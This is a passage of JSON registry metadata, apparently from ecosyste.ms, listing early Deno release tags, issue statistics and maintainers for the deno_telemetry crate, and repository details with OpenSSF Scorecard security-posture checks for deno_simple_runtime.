000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-24T14:59:18.862Z","dependent_packages_count":0,"downloads":209859,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.79244792282411,"dependent_repos_count":24.365143167900126,"dependent_packages_count":32.31740477147518,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.82499862073314},"purl":"pkg:cargo/deno_telemetry","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_telemetry","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_telemetry","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_telemetry/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-23T15:40:54.265Z","issues_count":6598,"pull_requests_count":9606,"avg_time_to_close_issue":17246074.663934425,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3780,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2464,"avg_comments_per_issue":2.5110639587753867,"avg_comments_per_pull_request":0.7159067249635644,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":662,"past_year_pull_requests_count":1182,"past_year_avg_time_to_close_issue":1381266.2837209303,"past_year_avg_time_to_close_pull_request":1332181.7239747634,"past_year_issues_closed_count":215,"past_year_pull_requests_closed_count":634,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":371,"past_year_avg_comments_per_issue":1.20392749244713,"past_year_avg_comments_per_pull_request":1.0829103214890017,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":464,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1778,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":376,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_telemetry/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_telemetry/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_telemetry/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_telemetry/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_telemetry/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_telemetry/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2024-11-25T17:13:51.984Z","updated_at":"2024-11-25T17:13:51.984Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2024-11-30T21:09:46.226Z","updated_at":"2024-11-30T21:09:46.226Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4310766,"name":"deno_simple_runtime","ecosystem":"cargo","description":"Provides the deno runtime library","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":18,"first_release_published_at":"2022-04-18T06:17:11.308Z","latest_release_published_at":"2022-08-21T03:00:24.690Z","latest_release_number":"0.73.2","last_synced_at":"2026-08-29T21:57:14.495Z","created_at":"2022-04-18T07:01:16.014Z","updated_at":"2026-08-29T21:57:14.495Z","registry_url":"https://crates.io/crates/deno_simple_runtime/","install_command":"cargo install deno_simple_runtime","documentation_url":"https://docs.rs/deno_simple_runtime/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party 